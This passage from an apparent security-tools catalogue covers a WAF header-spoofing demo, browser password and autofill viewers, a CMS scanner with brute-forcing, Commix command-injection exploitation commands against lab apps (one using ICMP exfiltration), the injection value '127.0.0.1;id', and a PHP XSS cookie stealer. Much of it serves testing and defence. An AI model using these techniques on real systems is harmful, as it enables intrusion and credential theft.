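TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def _parse(addr):
    try:
        return ipaddress.ip_address(addr.strip())
    except ValueError:
        return None


def _is_trusted_proxy(addr):
    ip = _parse(addr)
    return ip is not None and any(ip in net for net in TRUSTED_PROXIES)


def naive_client_ip(headers, peer_addr):
    """Weak pattern: take the first client-address header present, leftmost
    value first.  Every value consulted here is attacker-controlled."""
    for name in ("X-Forwarded-For",) + CLIENT_CONTROLLED_HEADERS:
        if headers.get(name):
            return headers[name].split(",")[0].strip()
    return peer_addr


def client_ip_from_trusted_chain(headers, peer_addr):
    """Corrected pattern: if the TCP peer is not one of our proxies the header
    is meaningless and the peer is the client.  Otherwise walk X-Forwarded-For
    from the right, dropping hops that are our proxies; the first other
    address is the one our outermost proxy actually talked to."""
    if not _is_trusted_proxy(peer_addr):
        return peer_addr
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",")]
    for hop in reversed(hops):
        if hop and not _is_trusted_proxy(hop):
            return hop
    return peer_addr


def waf_skips_inspection(headers, peer_addr, resolver):
    """A rule of the shape 'do not inspect requests from 127.0.0.1' (the WAF
    trusting itself), evaluated with the given address resolver."""
    ip = _parse(resolver(headers, peer_addr))
    return ip is not None and ip.is_loopback


# Constructed request: external client 203.0.113.7 sends the extension's four
# headers; proxy 10.0.0.5 appends the real client address to X-Forwarded-For
# before handing the request to the WAF.
SPOOFED_VIA_PROXY = {
    "X-Originating-IP": "127.0.0.1",
    "X-Forwarded-For": "127.0.0.1, 203.0.113.7",
    "X-Remote-IP": "127.0.0.1",
    "X-Remote-Addr": "127.0.0.1",
}
PROXY_PEER = "10.0.0.5"

if __name__ == "__main__":
    for name, resolver in [("naive", naive_client_ip),
                           ("trusted chain", client_ip_from_trusted_chain)]:
        skipped = waf_skips_inspection(SPOOFED_VIA_PROXY, PROXY_PEER, resolver)
        print(name, resolver(SPOOFED_VIA_PROXY, PROXY_PEER),
              "skipped" if skipped else "inspected")
```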

Download BypassWAF
CAPTIPPER - MALICIOUS HTTP TRAFFIC EXPLORER TOOL

CapTipper is a python tool to analyze, explore and revive HTTP malicious traffic.

CapTipper sets up a web server that acts exactly as the server in the PCAP file, and contains internal tools, with a powerful interactive console, for analysis and inspection of the hosts, objects and conversations found.

The tool provides the security researcher with easy access to the files and the understanding of the network flow, and is useful when trying to research exploits, pre-conditions, versions, obfuscations, plugins and shellcodes.

Feeding CapTipper with a drive-by traffic capture (e.g. of an exploit kit) shows the user the request URIs that were sent and the response meta-data.

The user can at this point browse to http://127.0.0.1/[URI] and receive the response back to the browser.

In addition, an interactive shell is launched for deeper investigation using various commands such as: hosts, hexdump, info, ungzip, body, client, dump and more...

Download CapTipper
CENOCIPHER - EASY-TO-USE, END-TO-END ENCRYPTED COMMUNICATIONS TOOL

CenoCipher is a free, open-source, easy-to-use tool for exchanging secure encrypted communications over the internet. It uses strong cryptography to convert messages and files into encrypted cipher-data, which can then be sent to the recipient via regular email or any other channel available, such as instant messaging or shared cloud storage.

FEATURES AT A GLANCE

Simple for anyone to use. Just type a message, click Encrypt, and go
Handles messages and file attachments together easily
End-to-end encryption, performed entirely on the user's machine
No dependence on any specific intermediary channel. Works with any communication method available
Uses three strong cryptographic algorithms in combination to triple-protect data
Optional steganography feature for embedding encrypted data within a Jpeg image
No installation needed - fully portable application can be run from anywhere
Unencrypted data is never written to disk - unless requested by the user
Multiple input/output modes for convenient operation

TECHNICAL DETAILS

Open source, written in C++
AES/Rijndael, Twofish and Serpent ciphers (256-bit keysize variants), cascaded together in CTR mode for triple-encryption of messages and files
HMAC-SHA-256 for construction of message authentication code
PBKDF2-HMAC-SHA256 for derivation of separate AES, Twofish and Serpent keys from user-chosen passphrase
Cryptographically safe pseudo-random number generator ISAAC for production of Initialization Vectors (AES/Twofish/Serpent) and Salts (PBKDF2)

VERSION HISTORY (CHANGE LOG)

VERSION 4.0 (DECEMBER 05, 2015)
Drastically overhauled and streamlined interface
Added multiple input/output modes for cipher-data
Added user control over unencrypted disk writes
Added auto-decrypt and open-with support
Added more entropy to Salt/IV generation

VERSION 3.0 (JUNE 29, 2015)
Added Serpent algorithm for cascaded triple-encryption
Added steganography option for concealing data within Jpeg
Added conversation mode for convenience
Improved header obfuscation for higher security
Increased entropy in generation of separate salt/IVs used by ciphers
Many other enhancements under the hood

VERSION 2.1 (DECEMBER 6, 2014)
Change cascaded encryption cipher modes from CBC to CTR for extra security
Improve PBKDF2 rounds determination and conveyance format
Fix minor bug related to Windows DPI font scaling
Fix minor bug affecting received filenames when saved by user

VERSION 2.0 (NOVEMBER 26, 2014)
Initial open-source release
Many enhancements to encryption algorithms and hash functions

VERSION 1.0 (JUNE 10, 2014)
Original program release (closed source / beta)

Download CenoCipher
CHEAT - CREATE AND VIEW INTERACTIVE CHEATSHEETS ON THE COMMAND-LINE

cheat allows you to create and view interactive cheatsheets on the command-line. It was designed to help remind *nix system administrators of options for commands that they use frequently, but not frequently enough to remember.

cheat depends only on python and pip.

Example

The next time you're forced to disarm a nuclear weapon without consulting Google, you may run:

cheat tar

You will be presented with a cheatsheet resembling:

# To extract an uncompressed archive:
tar -xvf /path/to/foo.tar
# To extract a .gz archive:
tar -xzvf /path/to/foo.tgz
# To create a .gz archive:
tar -czvf /path/to/foo.tgz /path/to/foo/
# To extract a .bz2 archive:
tar -xjvf /path/to/foo.tgz
# To create a .bz2 archive:
tar -cjvf /path/to/foo.tgz /path/to/foo/

To see what cheatsheets are available, run cheat -l.

Note that, while cheat was designed primarily for *nix system administrators, it is agnostic as to what content it stores. If you would like to use cheat to store notes on your favorite cookie recipes, feel free.

Installing

Using pip
sudo pip install cheat

Using homebrew
brew install cheat

Manually
First install the required python dependencies with:
sudo pip install docopt pygments

Then, clone this repository, cd into it, and run:
sudo python setup.py install

Modifying Cheatsheets

The value of cheat is that it allows you to create your own cheatsheets - the defaults are meant to serve only as a starting point, and can and should be modified.

Cheatsheets are stored in the ~/.cheat/ directory, and are named on a per-keyphrase basis. In other words, the content for the tar cheatsheet lives in the ~/.cheat/tar file.

Provided that you have an EDITOR environment variable set, you may edit cheatsheets with:

cheat -e foo

If the 'foo' cheatsheet already exists, it will be opened for editing. Otherwise, it will be created automatically.

After you've customized your cheatsheets, I urge you to track ~/.cheat/ along with your dotfiles.

Download Cheat
CHROME AUTOFILL VIEWER - TOOL TO VIEW OR DELETE AUTOCOMPLETE DATA FROM GOOGLE CHROME BROWSER

Chrome Autofill Viewer is the free tool to easily see and delete all your autocomplete data from Google Chrome browser.

Chrome stores Autofill entries (typically form fields) such as login name, pin, passwords, email, address, phone, credit/debit card number, search history etc. in an internal database file. 'Chrome Autofill Viewer' helps you to automatically find and view all the Autofill history data from Chrome browser. For each entry, it displays the following details:

Field Name
Value
Total Used Count
First Used Date
Last Used Date

You can also use it to view a history file belonging to another user on the same or a remote system. It also provides a one-click solution to delete all the displayed Autofill data from the history file.

It is very simple to use for everyone, which especially makes it a handy tool for Forensic investigators.

Chrome Autofill Viewer is fully portable and works on both 32-bit & 64-bit platforms starting from Windows XP to Windows 8.

Features

Instantly view all the Autofill list from Chrome browser
On startup, it auto detects the Autofill file from Chrome's default profile location
Sort feature to arrange the data in various orders to make it easier to search through 100's of entries.
Delete all the Autofill data with just a click of a button
Save the displayed Autofill list to HTML/XML/TEXT/CSV file
Easier and faster to use with its enhanced user friendly GUI interface
Fully Portable, does not require any third party components like JAVA, .NET etc
Support for local Installation and uninstallation of the software

How to Use?

Chrome Autofill Viewer is easy to use with its simple GUI interface. Here are the brief usage details:

Launch ChromeAutofillViewer on your system
By default it will automatically find and display the autofill file from the default profile location of Chrome. You can also select the desired file manually.
Next click on the 'Show All' button and all stored Autofill data will be displayed in the list as shown in screenshot 1 below.
If you want to remove all the entries, click on the 'Delete All' button below.
Finally you can save all displayed entries to HTML/XML/TEXT/CSV file by clicking on the 'Export' button and then select the type of file from the drop down box of 'Save File Dialog'.

Download Chrome Autofill Viewer


CHROMEPASS - CHROME BROWSER PASSWORD RECOVERY TOOL

ChromePass is a small password recovery tool that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry, the following information is displayed: Origin URL, Action URL, User Name Field, Password Field, User Name, Password, and Created Time.

You can select one or more items and then save them into text/html/xml file or copy them to the clipboard.

Using ChromePass

ChromePass doesn't require any installation process or additional DLL files. In order to start using ChromePass, simply run the executable file - ChromePass.exe. After running it, the main window will display all passwords that are currently stored in your Google Chrome browser.

Reading ChromePass passwords from external drive

Starting from version 1.05, you can also read the passwords stored by Chrome Web browser from an external profile in your current operating system or from another external drive (for example: from a dead system that cannot boot anymore). In order to use this feature, you must know the last logged-on password used for this profile, because the passwords are encrypted with the SHA hash of the log-on password, and without that hash, the passwords cannot be decrypted.

You can use this feature from the UI, by selecting the 'Advanced Options' in the File menu, or from command-line, by using the /external parameter. The user profile path should be something like "C:\Documents and Settings\admin" in Windows XP/2003 or "C:\users\myuser" in Windows Vista/2008.

Command-Line Options

/stext <Filename>       Save the list of passwords into a regular text file.
/stab <Filename>        Save the list of passwords into a tab-delimited text file.
/scomma <Filename>      Save the list of passwords into a comma-delimited text file.
/stabular <Filename>    Save the list of passwords into a tabular text file.
/shtml <Filename>       Save the list of passwords into HTML file (Horizontal).
/sverhtml <Filename>    Save the list of passwords into HTML file (Vertical).
/sxml <Filename>        Save the list of passwords to XML file.
/skeepass <Filename>    Save the list of passwords to KeePass csv file.
/external <User Profile Path> <Last Log-On Password>
                        Load the Chrome passwords from external drive/profile. For example:
                        chromepass.exe /external "C:\Documents and Settings\admin" "MyPassword"

Download ChromePass
CMSMAP - SCANNER TO DETECT SECURITY FLAWS OF THE MOST POPULAR CMSS (WORDPRESS, JOOMLA AND DRUPAL)

CMSmap is a python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs. The main purpose of CMSmap is to integrate common vulnerabilities for different types of CMSs in a single tool.

At the moment, CMSs supported by CMSmap are WordPress, Joomla and Drupal.

Please note that this project is in an early state. As such, you might find bugs, flaws or malfunctions. Use it at your own risk!

Installation

You can download the latest version of CMSmap by cloning the GitHub repository:

git clone https://github.com/Dionach/CMSmap.git

Usage

CMSmap tool v0.3 - Simple CMS Scanner
Author: Mike Manzotti mike.manzotti@dionach.com
Usage: cmsmap.py -t <URL>
  -t, --target      target URL (e.g. 'https://abc.test.com:8080/')
  -v, --verbose     verbose mode (Default: false)
  -T, --threads     number of threads (Default: 5)
  -u, --usr         username or file
  -p, --psw         password or file
  -i, --input       scan multiple targets listed in a given text file
  -o, --output      save output in a file
  -k, --crack       password hashes file
  -w, --wordlist    wordlist file (Default: rockyou.txt - WordPress only)
  -a, --agent       set custom user-agent
  -U, --update      (C)MSmap, (W)ordpress plugins and themes, (J)oomla components, (D)rupal modules
  -f, --force       force scan (W)ordpress, (J)oomla or (D)rupal
  -F, --fullscan    full scan using large plugin lists. Slow! (Default: false)
  -h, --help        show this help

Example: cmsmap.py -t https://example.com
         cmsmap.py -t https://example.com -f W -F
         cmsmap.py -t https://example.com -i targets.txt -o output.txt
         cmsmap.py -t https://example.com -u admin -p passwords.txt
         cmsmap.py -k hashes.txt

Download CMSmap
CODETAINER - A DOCKER CONTAINER IN YOUR BROWSER

codetainer allows you to create code 'sandboxes' you can embed in your web applications (think of it like an OSS clone of codepicnic.com).

Codetainer runs as a webservice and provides APIs to create, view, and attach to the sandbox along with a nifty HTML terminal you can interact with the sandbox in realtime. It uses Docker and its introspection APIs to provide the majority of this functionality.

Codetainer is written in Go. For more information, see the slides from a talk introduction.

Build & Installation

Requirements

Docker >=1.8 (required for file upload API)
Go >=1.4
godep

Building & Installing From Source

# set your $GOPATH
go get github.com/codetainerapp/codetainer
# you may get errors about not compiling due to Asset missing, it's ok. bindata.go needs to be created
# by `go generate` first.
cd $GOPATH/src/github.com/codetainerapp/codetainer
# make install_deps   # if you need the dependencies like godep
make

This will create ./bin/codetainer.

Configuring Docker

You must configure Docker to listen on a TCP port.

DOCKER_OPTS="-H tcp://127.0.0.1:4500 -H unix:///var/run/docker.sock"

Configuring codetainer

See ~/.codetainer/config.toml. This file will get auto-generated the first time you run codetainer, please edit defaults as appropriate.

# Docker API server and port
DockerServer = "localhost"
DockerPort = 4500
# Enable TLS support (optional, if you access the Docker API over HTTPS)
# DockerServerUseHttps = true
# Certificate directory path (optional)
# e.g. if you use Docker Machine: "~/.docker/machine/certs"
# DockerCertPath = "/path/to/certs"
# Database path (optional, default is ~/.codetainer/codetainer.db)
# DatabasePath = "/path/to/codetainer.db"

Running an example codetainer

$ sudo docker pull ubuntu:14.04
$ codetainer image register ubuntu:14.04
$ codetainer create ubuntu:14.04 my-codetainer-name
$ codetainer server   # to start the API server on port 3000

Embedding a codetainer in your web app

1. Copy codetainer.js to your webapp.
2. Include codetainer.js and jquery in your web page. Create a div to house the codetainer terminal iframe (it's #terminal in the example below).

<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <title>lsof tutorial</title>
  <link rel='stylesheet' href='/stylesheets/style.css' />
  <script src="http://code.jquery.com/jquery-1.10.1.min.js"></script>
  <script src="/javascripts/codetainer.js"></script>
  <script src="/javascripts/lsof.js"></script>
</head>
<body>
  <div id="terminal" data-container="YOUR CODETAINER ID HERE"></div>
</body>
</html>

3. Run the javascript to load the codetainer iframe from the codetainer API server (supply data-container as the id of the codetainer on the div, or supply codetainer in the constructor options).

$('#terminal').codetainer({
  terminalOnly: false,                  // set to true to show only a terminal window
  url: "http://127.0.0.1:3000",         // replace with codetainer server URL
  container: "YOUR CONTAINER ID HERE",
  width: "100%",
  height: "100%",
});

Download Codetainer
COLLECTION OF AWESOME HONEYPOTS

A curated list of awesome honeypots, tools, components and much more. The list is divided into categories such as web, services, and others, focusing on open source projects.

HONEYPOTS

Database Honeypots
Elastic honey - A Simple Elasticsearch Honeypot
mysql - A mysql honeypot, still very very early stage
A framework for nosql databases (only redis for now) - The NoSQL Honeypot Framework
ESPot - ElasticSearch Honeypot

Web honeypots
Glastopf - Web Application Honeypot
phpmyadmin_honeypot - A simple and effective phpMyAdmin honeypot
servlet - Web application Honeypot
Nodepot - A nodejs web application honeypot
basic-auth-pot bap - http Basic Authentication honeyPot
Shadow Daemon - A modular Web Application Firewall / High-Interaction Honeypot for PHP, Perl & Python apps
Servletpot - Web application Honeypot
Google Hack Honeypot - designed to provide reconnaissance against attackers that use search engines as a hacking tool against your resources.
smart-honeypot - PHP Script demonstrating a smart honey pot
HonnyPotter - A WordPress login honeypot for collection and analysis of failed login attempts.
wp-smart-honeypot - WordPress plugin to reduce comment spam with a smarter honeypot
wordpot - A WordPress Honeypot
Bukkit Honeypot Honeypot - A honeypot plugin for Bukkit
Laravel Application Honeypot - Honeypot - Simple spam prevention package for Laravel applications
stack-honeypot - Inserts a trap for spam bots into responses
EoHoneypotBundle - Honeypot type for Symfony2 forms
shockpot - WebApp Honeypot for detecting Shell Shock exploit attempts

Service Honeypots
Kippo - Medium interaction SSH honeypot
honeyntp - NTP logger/honeypot
honeypot-camera - observation camera honeypot
troje - a honeypot built around lxc containers. It will run each connection with the service within a separate lxc container.
slipm-honeypot - A simple low-interaction port monitoring honeypot
HoneyPy - A low interaction honeypot
Ensnare - Easy to deploy Ruby honeypot
RDPy - A Microsoft Remote Desktop Protocol (RDP) honeypot in python
Anti-honeypot stuff
kippo_detect - This is not a honeypot, but it detects kippo. (This guy has lots of more interesting stuff)

ICS/SCADA honeypots
Conpot - ICS/SCADA honeypot
scada-honeynet - mimics many of the services from a popular PLC and better helps SCADA researchers understand potential risks of exposed control system devices
SCADA honeynet - Building Honeypots for Industrial Networks

Deployment
Dionaea and EC2 in 20 Minutes - a tutorial on setting up Dionaea on an EC2 instance
honeypotpi - Script for turning a Raspberry Pi into a Honey Pot Pi

Data Analysis
Kippo-Graph - a full featured script to visualize statistics from a Kippo SSH honeypot
Kippo stats - Mojolicious app to display statistics for your kippo SSH honeypot

Other/random
NOVA uses honeypots as detectors, looks like a complete system.
Open Canary - A low interaction honeypot intended to be run on internal networks.
libemu - Shellcode emulation library, useful for shellcode detection.

Open Relay Spam Honeypot
SpamHAT - Spam Honeypot Tool

Botnet C2 monitor
Hale - Botnet command & control monitor

IPv6 attack detection tool
ipv6-attack-detector - Google Summer of Code 2012 project, supported by The Honeynet Project organization

Research Paper
vEYE - behavioral footprinting for self-propagating worm detection and profiling

Honeynet statistics
HoneyStats - A statistical view of the recorded activity on a Honeynet

Dynamic code instrumentation toolkit
Frida - Inject JavaScript to explore native apps on Windows, Mac, Linux, iOS and Android

Front-end for dionaea
DionaeaFR - Front Web to Dionaea low-interaction honeypot

Tool to convert website to server honeypots
HIHAT - Transform arbitrary PHP applications into web-based high-interaction Honeypots

Malware collector
Kippo-Malware - Python script that will download all malicious files stored as URLs in a Kippo SSH honeypot database

Sebek in QEMU
Qebek - QEMU based Sebek. As Sebek, it is a data capture tool for high interaction honeypots

Malware Simulator
imalse - Integrated MALware Simulator and Emulator

Distributed sensor deployment
Smarthoneypot - custom honeypot intelligence system that is simple to deploy and easy to manage
Modern Honey Network - Multi-snort and honeypot sensor management, uses a network of VMs, small footprint SNORT installations, stealthy dionaeas, and a centralized server for management
ADHD - Active Defense Harbinger Distribution (ADHD) is a Linux distro based on Ubuntu LTS. It comes with many tools aimed at active defense preinstalled and configured

Network Analysis Tool
Tracexploit - replay network packets

Log anonymizer
LogAnon - log anonymization library that helps having anonymous logs consistent between logs and network captures

server
Honeysink - open source network sinkhole that provides a mechanism for detection and prevention of malicious traffic on a given network

Botnet traffic detection
dnsMole - analyse dns traffic, and to potentially detect botnet C&C server and infected hosts

Low interaction honeypot (router back door)
Honeypot-32764 - Honeypot for router backdoor (TCP 32764)

honeynet farm traffic redirector
Honeymole - Deploy multiple sensors that redirect traffic to a centralized collection of honeypots
HTTPS Proxy
mitmproxy - allows traffic flows to be intercepted,
inspected, modified and replayed
spamtrap
SendMeSpamIDS.py Simple SMTP fetch all IDS and
analyzer
System instrumentation
Sysdig - open source, system-level exploration:
capture system state and activity from a running
Linux instance, then save, filter and analyze
Honeypot for USB-spreading malware
Ghost-usb - honeypot for malware that propagates
via USB storage devices
Data Collection
Kippo2MySQL - extracts some very basic stats from
Kippos text-based log files (a mess to analyze!) and
inserts them in a MySQL database
Kippo2ElasticSearch - Python script to transfer data
from a Kippo SSH honeypot MySQL database to an
ElasticSearch instance (server or cluster)
Passive network audit framework parser
pnaf - Passive Network Audit Framework
VM Introspection
VIX virtual machine introspection toolkit - VMI toolkit
for Xen, called Virtual Introspection for Xen (VIX)
vmscope - Monitoring of VM-based High-Interaction
Honeypots
vmitools - C library with Python bindings that makes it
easy to monitor the low-level details of a running
virtual machine
Binary debugger
Hexgolems - Schem Debugger Frontend - A
debugger frontend
Hexgolems - Pint Debugger Backend - A debugger
backend and LUA wrapper for PIN
Mobile Analysis Tool
APKinspector - APKinspector is a powerful GUI tool for analysts to analyze the Android applications
Androguard - Reverse engineering, Malware and goodware analysis of Android applications ... and more
Low interaction honeypot
Honeypoint - platform of distributed honeypot technologies
Honeyperl - Honeypot software based on Perl with plugins developed for many functions like: wingates, telnet, squid, smtp, etc.
Honeynet data fusion
HFlow2 - data coalescing tool for honeynet/network analysis
Server
LaBrea - takes over unused IP addresses, and creates virtual servers that are attractive to worms, hackers, and other denizens of the Internet.
Kippo - SSH honeypot
KFSensor - Windows based honeypot Intrusion Detection System (IDS)
Honeyd - also see more honeyd tools below
Glastopf - Honeypot which emulates thousands of vulnerabilities to gather data from attacks targeting web applications
DNS Honeypot - Simple UDP honeypot scripts
Conpot - low interactive server side Industrial Control Systems honeypot
Bifrozt - High interaction honeypot solution for Linux based systems
Beeswarm - Honeypot deployment made easy
Bait and Switch - redirects all hostile traffic to a honeypot that is partially mirroring your production system
Artillery - open-source blue team tool designed to protect Linux and Windows operating systems through multiple methods
Amun - vulnerability emulation honeypot
VM cloaking script
Antivmdetect - Script to create templates to use with VirtualBox to make vm detection harder
IDS signature generation
Honeycomb
lookup service for AS-numbers and prefixes
CC2ASN
Web interface (for Thug)
Rumal - Thug's Rumāl: a Thug's dress & weapon
Data Collection / Data Sharing
HPfriends - data-sharing platform
HPFeeds - lightweight authenticated publish-subscribe protocol
Distributed spam tracking
Project Honeypot
Python bindings for libemu
Pylibemu - A Libemu Cython wrapper
Controlled-relay spam honeypot
Shiva - Spam Honeypot with Intelligent Virtual
Analyzer
Shiva The Spam Honeypot Tips And Tricks For
Getting It Up And Running
Visualization Tool
Glastopf Analytics
Afterglow Cloud
Afterglow
central management tool
PHARM
Network connection analyzer
Impost
Virtual Machine Cloaking
VMCloak
Honeypot deployment
Modern Honey Network
SurfIDS
Automated malware analysis system
Cuckoo
Anubis
Hybrid Analysis
Low interaction
mwcollectd
Low interaction honeypot on USB stick
Honeystick
Honeypot extensions to Wireshark
Wireshark Extensions
Data Analysis Tool
HpfeedsHoneyGraph
Acapulco
Telephony honeypot
Zapping Rachel
Client
Pwnypot
MonkeySpider
Capture-HPC-NG
Wepawet
URLQuery
Trigona
Thug
Shelia
PhoneyC
Jsunpack-n
HoneyC
HoneyBOT
CWSandbox / GFI Sandbox
Capture-HPC-Linux
Capture-HPC
Andrubis
Visual analysis for network traffic
ovizart
Binary Management and Analysis Framework
Viper
Honeypot
Single-honeypot
Honeyd For Windows
IMHoneypot
Deception Toolkit
PDF document inspector
peepdf
Distribution system
Thug Distributed Task Queuing
HoneyClient Management
HoneyWeb
Network Analysis
HoneyProxy
Hybrid low/high interaction honeypot
HoneyBrid
Sebek on Xen
xebek
SSH Honeypot
Kojoney
Cowrie
Glastopf data analysis
Glastopf Analytics
Distributed sensor project
DShield Web Honeypot Project
Distributed Web Honeypot Project
a pcap analyzer
Honeysnap
Client Web crawler
HoneySpider Network
network traffic redirector
Honeywall
Honeypot Distribution with mixed content
HoneyDrive
Honeypot sensor
Dragon Research Group Distro
Honeeepi - Honeeepi is a honeypot sensor on a Raspberry Pi based on a customized Raspbian OS.
File carving
TestDisk & PhotoRec
File and Network Threat Intelligence
VirusTotal
data capture
Sebek
SSH proxy
HonSSH
Anti-Cheat
Minecraft honeypot
behavioral analysis tool for win32
Capture BAT
Live CD
DAVIX
Spamtrap
Spampot.py
Spamhole
spamd
Mail::SMTP::Honeypot - perl module that appears to
provide the functionality of a standard SMTP server
Commercial honeynet
Specter
Netbait
Server (Bluetooth)
Bluepot
Dynamic analysis of Android apps
Droidbox
Dockerized Low Interaction packaging
Manuka
Dockerized Thug
Dockerpot - A docker based honeypot.
Docker honeynet - Several Honeynet tools set up for Docker containers
Network analysis
Quechua
Sebek data visualization
Sebek Dataviz
SIP Server
Artemnesia VoIP
Botnet C2 monitoring
botsnoopd
low interaction
mysqlpot
Malware collection
Honeybow

HONEYD TOOLS

Honeyd plugin
Honeycomb
Honeyd viewer
Honeyview
Honeyd to MySQL connector
Honeyd2MySQL
A script to visualize statistics from honeyd
Honeyd-Viz
Honeyd UI
Honeyd configuration GUI - application used to configure the honeyd daemon and generate configuration files
Honeyd stats
Honeydsum.pl

NETWORK AND ARTIFACT ANALYSIS

Sandbox
RFISandbox - a PHP 5.x script sandbox built on top of funcall
dorothy2 - A malware/botnet analysis framework written in Ruby
COMODO automated sandbox
Argos - An emulator for capturing zero-day attacks
Sandbox-as-a-Service
malwr.com - free malware analysis service and community
detux.org - Multiplatform Linux Sandbox
Joebox Cloud - analyzes the behavior of malicious files including PEs, PDFs, DOCs, PPTs, XLSs, APKs, URLs and MachOs on Windows, Android and Mac OS X for suspicious activities

DATA TOOLS

Front Ends
Tango - Honeypot Intelligence with Splunk
Django-kippo - Django App for kippo SSH Honeypot
Wordpot-Frontend - a full featured script to visualize statistics from a Wordpot honeypot
Shockpot-Frontend - a full featured script to visualize statistics from a Shockpot honeypot
Visualization
HoneyMap - Real-time websocket stream of GPS events on a fancy SVG world map
HoneyMalt - Maltego transforms for mapping Honeypot systems

COMMIX - AUTOMATED ALL-IN-ONE OS COMMAND INJECTION AND EXPLOITATION TOOL

Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and can be used by web developers, penetration testers or even security researchers to test web applications with the aim of finding bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. Commix is written in the Python programming language.
Requirements

Python version 2.6.x or 2.7.x is required for running this program.

Installation

Download commix by cloning the Git repository:

git clone https://github.com/stasinopoulos/commix.git commix

Usage

Usage: python commix.py [options]

Options
  -h, --help            Show help and exit.
  --verbose             Enable the verbose mode.
  --install             Install 'commix' to your system.
  --version             Show version number and exit.
  --update              Check for updates (apply if any) and exit.

Target
  This option has to be provided, to define the target URL.
  --url=URL             Target URL.
  --url-reload          Reload target URL after command execution.

Request
  These options can be used to specify how to connect to the target URL.
  --host=HOST           HTTP Host header.
  --referer=REFERER     HTTP Referer header.
  --user-agent=AGENT    HTTP User-Agent header.
  --cookie=COOKIE       HTTP Cookie header.
  --headers=HEADERS     Extra headers (e.g. 'Header1:Value1\nHeader2:Value2').
  --proxy=PROXY         Use a HTTP proxy (e.g. '127.0.0.1:8080').
  --auth-url=AUTH_..    Login panel URL.
  --auth-data=AUTH..    Login parameters and data.
  --auth-cred=AUTH..    HTTP Basic Authentication credentials (e.g. 'admin:admin').

Injection
  These options can be used to specify which parameters to inject and to provide custom injection payloads.
  --data=DATA           POST data to inject (use 'INJECT_HERE' tag).
  --suffix=SUFFIX       Injection payload suffix string.
  --prefix=PREFIX       Injection payload prefix string.
  --technique=TECH      Specify a certain injection technique: 'classic', 'eval-based', 'time-based' or 'file-based'.
  --maxlen=MAXLEN       The length of the output on time-based technique (Default: 10000 chars).
  --delay=DELAY         Set Time-delay for time-based and file-based techniques (Default: 1 sec).
  --base64              Use Base64 (enc)/(de)code trick to prevent false-positive results.
  --tmp-path=TMP_P..    Set remote absolute path of temporary files directory.
  --icmp-exfil=IP_..    Use the ICMP exfiltration technique (e.g. 'ip_src=192.168.178.1,ip_dst=192.168.178.3').

Usage Examples

Exploiting Damn Vulnerable Web App:
python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=INJECT_HERE&submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

Exploiting php-Charts 1.0 using injection payload suffix & prefix string:
python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=INJECT_HERE" --prefix="//" --suffix="'"

Exploiting OWASP Mutillidae using Extra headers and HTTP proxy:
python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=INJECT_HERE" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"

Exploiting Persistence using ICMP exfiltration technique:
su -c "python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8""
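The DVWA and Mutillidae pages in the examples above are handlers that hand a user-supplied host to a shell command (ping, DNS lookup); that is the sink Commix's INJECT_HERE marker is placed into. As an added example that is neither Commix's code nor the code of those applications, here is the same kind of handler in Python in its vulnerable form beside a hardened one, so the bug class is clear from the defender's side; the function names and the sample inputs are my own constructions.

```python
"""Command-injection sink and its hardened form (added example, not from Commix).

Mirrors the DVWA 'exec' page used in the Commix examples: a web handler
that pings a host taken from the request. Function names and the inputs
used in the demo are constructed for this illustration.
"""
import ipaddress
import shlex
import subprocess


def ping_vulnerable(host: str) -> str:
    """VULNERABLE: the untrusted value is spliced into a shell command string.
    Shell metacharacters in 'host' (; | && $( ) ...) are interpreted by /bin/sh,
    so the caller can run arbitrary commands. Shown for contrast only."""
    return subprocess.check_output("ping -c 1 " + host, shell=True, text=True)


def shell_tokens(host: str) -> list:
    """Show how a POSIX shell would tokenise the vulnerable command line.
    shlex with punctuation_chars splits on ; | & ( ) < > the way a shell does,
    so any token after the host is a second command."""
    lexer = shlex.shlex("ping -c 1 " + host, posix=True, punctuation_chars=True)
    return list(lexer)


class InvalidHost(ValueError):
    """Raised when the request parameter is not an IP literal or a hostname."""


def validate_host(host: str) -> str:
    """Allow-list validation: accept an IPv4/IPv6 literal or a plain DNS name
    (letters, digits and hyphens in dot-separated labels), reject anything else.
    Validation happens before the value gets anywhere near a subprocess."""
    host = host.strip()
    if not host or len(host) > 253:
        raise InvalidHost("empty or too long")
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass  # not an IP literal, try it as a hostname
    for label in host.rstrip(".").split("."):
        if not 1 <= len(label) <= 63 or label.startswith("-") or label.endswith("-"):
            raise InvalidHost("bad label: %r" % label)
        if not all(ch.isascii() and (ch.isalnum() or ch == "-") for ch in label):
            raise InvalidHost("bad character in label: %r" % label)
    return host


def is_safe_host(host: str) -> bool:
    """True when validate_host() accepts the value."""
    try:
        validate_host(host)
        return True
    except InvalidHost:
        return False


def build_ping_argv(host: str) -> list:
    """HARDENED: validate first, then build an argv list. Without shell=True
    there is no shell to interpret metacharacters, and the allow-list above
    stops a value starting with '-' from being read as a ping option."""
    return ["ping", "-c", "1", validate_host(host)]


def ping_hardened(host: str) -> str:
    """Run ping on a validated host without going through a shell."""
    return subprocess.check_output(build_ping_argv(host), text=True)


if __name__ == "__main__":
    print(shell_tokens("127.0.0.1;id"))   # the shell sees a second command
    print(build_ping_argv("127.0.0.1"))   # ['ping', '-c', '1', '127.0.0.1']
    print(is_safe_host("127.0.0.1;id"))   # False: rejected before any exec
```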

Download Commix
COOKIES MANAGER - SIMPLE COOKIE STEALER

A simple program in PHP to help with XSS vulnerabilities. The features of this program are the following:
[+] Cookie Stealer with TinyURL Generator
[+] Lets you see the cookies that a page returns
[+] Can create cookies with the information you want
